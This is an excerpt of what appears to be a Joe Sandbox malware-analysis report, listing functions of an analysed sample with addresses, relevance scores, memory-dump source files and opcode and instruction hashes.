                                      • Instruction ID: 1157f35152211a4b853956c77b4d2417a25dc3b5dce30650eafbed1e0062a521
                                      • Opcode Fuzzy Hash: 8e61a0345426cfbf98e966bfd6dd27ed2445dff38cff5604a39dc23a55b332d0
                                      • Instruction Fuzzy Hash: 6C5190377286908BD764CF25E400A9E73A5F788798F455126EF4A93B08CF39E945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38C7B8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c44f08b774434d1c2136fe748e04a0077f53503c1e88ff3ce48f42e5bcad7e07
                                      • Instruction ID: b40ca79c20cc711808507a3ab4e915b7fccbbc15d6651ca66a8594e4b3d6a060
                                      • Opcode Fuzzy Hash: c44f08b774434d1c2136fe748e04a0077f53503c1e88ff3ce48f42e5bcad7e07
                                      • Instruction Fuzzy Hash: 4341DE22715A5586EE48CF2AE9142A977A1AB58FD8B4D9032EF0DD7764EE3CD486C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A390CA0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 49e9b622a0bfff4a584b6ce6135862a2cc150116dd83739bda1dc6aafe13e0e1
                                      • Instruction ID: 5000616330be4f7be0f9984a1b4ca593f4cf8042bcd66b4338b66e85b4ee6483
                                      • Opcode Fuzzy Hash: 49e9b622a0bfff4a584b6ce6135862a2cc150116dd83739bda1dc6aafe13e0e1
                                      • Instruction Fuzzy Hash: 29B09224E17A06C6EA082F11AD8225822E9BF88704F9D80B9D10CE1320EE2C20A54700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3738E4 Relevance: .9, Instructions: 931COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 105ca43f00b5e57847d96d9c55c98dcead2d2fe65cfd248801b2ca2ada2e485a
                                      • Instruction ID: f21be2d3a1d64c566ba0fb39c9e19f8ee592d13b3d642073bf896d80ceee827e
                                      • Opcode Fuzzy Hash: 105ca43f00b5e57847d96d9c55c98dcead2d2fe65cfd248801b2ca2ada2e485a
                                      • Instruction Fuzzy Hash: 9682EFA3A096C1C6DB05CF28D4442BC7BA1EB55B88F0D817ACB8AD7385DE3DEA45D310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3576C0 Relevance: .9, Instructions: 893COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                      • Instruction ID: 53e737057ac7d03e01db8ed9e911d1c46c3386a53056d22c63206b743cdf6447
                                      • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                      • Instruction Fuzzy Hash: 45627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A375370 Relevance: .9, Instructions: 891COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0c1eca1490c6f524e8de29083b0d75a9f12f0148716ba9bc99da8edd74597df
                                      • Instruction ID: cd029c13226dc38cdba4f273918aba9fa15cf2adab2043ad99c6b7130a014c6d
                                      • Opcode Fuzzy Hash: f0c1eca1490c6f524e8de29083b0d75a9f12f0148716ba9bc99da8edd74597df
                                      • Instruction Fuzzy Hash: 31821FB3A096C18AD768CF28C4446FC7BA1EB55B4CF198176CA4EE7785CE38DA85C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36BB4C Relevance: .6, Instructions: 587COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e191559d85294972c8b15a22cf3b400ae880c7d5fcdb58d6052d2ea93da585ac
                                      • Instruction ID: 9da414f075041bca9d2daeb4758a16a6454bc01e8d15717db0376ae28f8853b2
                                      • Opcode Fuzzy Hash: e191559d85294972c8b15a22cf3b400ae880c7d5fcdb58d6052d2ea93da585ac
                                      • Instruction Fuzzy Hash: 2822F573B206508BD728CF25D89AE5E3766F798748B4B8228DF0ACB785DB38D505CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A374B18 Relevance: .6, Instructions: 578COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f657be7e1f195e1cb0a077a2e8992a9c2316c08defb54c66119332128546ffa
                                      • Instruction ID: 232da43453fe49055bca242c7485b62975907a33eb53397a359ffb0603397656
                                      • Opcode Fuzzy Hash: 1f657be7e1f195e1cb0a077a2e8992a9c2316c08defb54c66119332128546ffa
                                      • Instruction Fuzzy Hash: B432BE72A086918BE71CCF24D550ABC37A1FB54B48F098179DB4AE7B88DF3CA955C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A357288 Relevance: .3, Instructions: 294COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
                                      • Instruction ID: c366f2ec36b89976784fc5f34979e26d703d8b5018a71ac0fc2a186a4df76b24
                                      • Opcode Fuzzy Hash: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
                                      • Instruction Fuzzy Hash: 68C1ACB7B281908FE350CF7AE400A9D3BB1F39878CB559125EF59A3B09D639E645CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A372CD8 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
                                      • Instruction ID: 751adf6ad8f569ef17a550c07f00ad148b02e20fa9a8df86b85d2696d0a051f8
                                      • Opcode Fuzzy Hash: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
                                      • Instruction Fuzzy Hash: 7FA15373E0828286EB10CAA4D4447F96791EF9474CF1D41B5EA4EE7B82DE3CEA41C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36AED4 Relevance: .2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
                                      • Instruction ID: 6817cd5f3e160c42ddec03a53fcf124a4c4e7fe632fa9fadd1cbd073ddcaf4ce
                                      • Opcode Fuzzy Hash: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
                                      • Instruction Fuzzy Hash: 53C1F677A291E04DE302CBB5A4248FD3FF1E71E34DB4A4152EFA6A7B4AD5285201DF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35A2FC Relevance: .2, Instructions: 230COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                      • Instruction ID: 7878ceb897d55f112daa60956d3f970abafe64fea99fb5e6518ecd06741d2dfb
                                      • Opcode Fuzzy Hash: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                      • Instruction Fuzzy Hash: 47910E62A1858296EB11CF29E4056FD2761FF9978CF481031EF4EE7B59EE38E606C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35A664 Relevance: .2, Instructions: 195COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                      • Instruction ID: 2a05b30542f4ff5dba213abbd1bc35bb1a7f8bce9f7c78ec3eff6bb9ad852a26
                                      • Opcode Fuzzy Hash: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                      • Instruction Fuzzy Hash: 82812523B1875285EB10DB25E8446EE67A1FF8978CF484071DE4DE7B89DE38D506CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36B4F0 Relevance: .2, Instructions: 181COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                      • Instruction ID: 73eb86baee7e76ed6783833b460e6d2afbee3383736e75758949e6096a4031b0
                                      • Opcode Fuzzy Hash: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                      • Instruction Fuzzy Hash: 8461F122B181D549EB11CF7585104FD7FB1AB59788B4A80B2CF9AE3B46DE3CE506CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A372150 Relevance: .1, Instructions: 137COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                      • Instruction ID: 0a2e7960597564fba77b4ea3dfb4724ed8bdcdd25361b58025fa7916266ecf5b
                                      • Opcode Fuzzy Hash: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                      • Instruction Fuzzy Hash: 07511473B181918BE7588F68E5087793761FB94748F494134DB4AD7A88DE3DDA41CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A372A30 Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                      • Instruction ID: b62a798ed234ae3e784c500cbb025a316df114c8742b0615d5139efc24826332
                                      • Opcode Fuzzy Hash: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                      • Instruction Fuzzy Hash: 45312AB2A186828BDB59CE56E65027EB7D0FB45788F18813DDB4AD3B41DE3CE551CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36DBEC Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction ID: a11f7eb30e3bcc9e984673293670ff9bf21858eaaad6e6d999bf7a28b6f25a0e
                                      • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction Fuzzy Hash: 39F0DA65F1CC2B42FB681C28981973910419F6139CF5C84B5D01FE77C1DCDDA8A1A129
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3832D4 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                      • Instruction ID: 66c628bee180606d0f5f66142e5138243aae102121d86a491c581f8383b50eb9
                                      • Opcode Fuzzy Hash: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                      • Instruction Fuzzy Hash: 2EA0026590DC43E5E6548F05F9A10302734FF90318B4840B1F01DE11A4DF3CA400C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35D7E0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
